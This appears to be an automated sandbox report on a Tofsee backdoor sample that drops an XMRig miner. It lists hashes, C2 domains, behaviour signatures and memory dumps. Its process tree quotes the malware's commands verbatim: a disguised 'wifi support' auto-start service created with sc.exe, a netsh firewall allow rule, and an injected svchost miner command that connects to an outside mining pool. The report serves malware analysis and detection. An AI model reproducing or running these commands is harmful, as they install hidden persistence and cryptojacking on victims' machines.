Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    12-06-2022 14:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    db81d579f15211797c155f6b4b7c9eafc85f4aa91cffc4a29c13046f0b81c762.exe

  • Size

    218KB

  • MD5

    148f7fcde4e1bf6db1ff02c6dae2c81b

  • SHA1

    c7922dfb7ad153ac9ec6d1a293e7f70c8760d5db

  • SHA256

    db81d579f15211797c155f6b4b7c9eafc85f4aa91cffc4a29c13046f0b81c762

  • SHA512

    4a542362cfbd9306d75020420c73d4f0ecfd7b91442b5802c92482ba8c2361b252efc6760444ca18ffecee3300c25abb0f7fa29f309136744f0b731cc922a5cd

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\db81d579f15211797c155f6b4b7c9eafc85f4aa91cffc4a29c13046f0b81c762.exe
    "C:\Users\Admin\AppData\Local\Temp\db81d579f15211797c155f6b4b7c9eafc85f4aa91cffc4a29c13046f0b81c762.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mejpltbb\
      2⤵
        PID:4028
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zhevbfgr.exe" C:\Windows\SysWOW64\mejpltbb\
        2⤵
          PID:4292
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create mejpltbb binPath= "C:\Windows\SysWOW64\mejpltbb\zhevbfgr.exe /d\"C:\Users\Admin\AppData\Local\Temp\db81d579f15211797c155f6b4b7c9eafc85f4aa91cffc4a29c13046f0b81c762.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4560
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description mejpltbb "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4656
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start mejpltbb
          2⤵
          • Launches sc.exe
          PID:1112
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1552
      • C:\Windows\SysWOW64\mejpltbb\zhevbfgr.exe
        C:\Windows\SysWOW64\mejpltbb\zhevbfgr.exe /d"C:\Users\Admin\AppData\Local\Temp\db81d579f15211797c155f6b4b7c9eafc85f4aa91cffc4a29c13046f0b81c762.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4904
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:32
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4232

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\zhevbfgr.exe
        Filesize

        11.9MB

        MD5

        f931fba9160ba1f6030c753bac186178

        SHA1

        642184879d3ad4eb2a86efcde496d235325df33c

        SHA256

        c13cecc87c57ea48ab357add6684f152f22281b9aceedbc9a20c2a5f4201a43d

        SHA512

        2863806bcaa1abc06d91b96fa91267c58cb262e523f4c748c5a32cfe3252da6999accc0a184edb385c1d9a41c7ea47452d9cc2ee113b09db55de2ecc9e17b0bb

        Download Submit
      • C:\Windows\SysWOW64\mejpltbb\zhevbfgr.exe
        Filesize

        11.9MB

        MD5

        f931fba9160ba1f6030c753bac186178

        SHA1

        642184879d3ad4eb2a86efcde496d235325df33c

        SHA256

        c13cecc87c57ea48ab357add6684f152f22281b9aceedbc9a20c2a5f4201a43d

        SHA512

        2863806bcaa1abc06d91b96fa91267c58cb262e523f4c748c5a32cfe3252da6999accc0a184edb385c1d9a41c7ea47452d9cc2ee113b09db55de2ecc9e17b0bb

        Download Submit
      • memory/32-488-0x0000000002EB0000-0x0000000002EC5000-memory.dmp
        Filesize

        84KB

        Download
      • memory/32-482-0x0000000002EB0000-0x0000000002EC5000-memory.dmp
        Filesize

        84KB

        Download
      • memory/32-434-0x0000000002EB9A6B-mapping.dmp
        Download
      • memory/1112-193-0x0000000000000000-mapping.dmp
        Download
      • memory/1552-209-0x0000000000000000-mapping.dmp
        Download
      • memory/2444-157-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-218-0x0000000000400000-0x0000000000652000-memory.dmp
        Filesize

        2.3MB

        Download
      • memory/2444-124-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-125-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-126-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-127-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-129-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-128-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-130-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-131-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-132-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-133-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-134-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-136-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-137-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-138-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-139-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-135-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-140-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-141-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-142-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-143-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-144-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-145-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-146-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-147-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-148-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-149-0x00000000008FA000-0x0000000000908000-memory.dmp
        Filesize

        56KB

        Download
      • memory/2444-151-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-160-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-152-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-153-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-154-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-155-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-162-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-122-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-158-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-159-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-150-0x00000000007C0000-0x00000000007D3000-memory.dmp
        Filesize

        76KB

        Download
      • memory/2444-123-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-156-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-163-0x0000000000400000-0x0000000000652000-memory.dmp
        Filesize

        2.3MB

        Download
      • memory/2444-164-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-165-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-166-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-167-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-168-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-118-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-119-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-120-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-121-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-215-0x00000000007C0000-0x00000000007D3000-memory.dmp
        Filesize

        76KB

        Download
      • memory/2444-161-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2444-212-0x00000000008FA000-0x0000000000908000-memory.dmp
        Filesize

        56KB

        Download
      • memory/4028-172-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4028-169-0x0000000000000000-mapping.dmp
        Download
      • memory/4028-179-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4028-170-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4028-171-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4028-173-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4232-523-0x000000000069259C-mapping.dmp
        Download
      • memory/4292-178-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4292-180-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4292-174-0x0000000000000000-mapping.dmp
        Download
      • memory/4292-176-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4292-177-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4292-175-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4560-182-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4560-183-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4560-181-0x0000000000000000-mapping.dmp
        Download
      • memory/4560-186-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4560-187-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4656-188-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4656-189-0x00000000774A0000-0x000000007762E000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4656-185-0x0000000000000000-mapping.dmp
        Download
      • memory/4904-438-0x0000000000400000-0x0000000000652000-memory.dmp
        Filesize

        2.3MB

        Download
      • memory/4904-436-0x0000000000856000-0x0000000000863000-memory.dmp
        Filesize

        52KB

        Download
      • memory/4904-487-0x0000000000400000-0x0000000000652000-memory.dmp
        Filesize

        2.3MB

        Download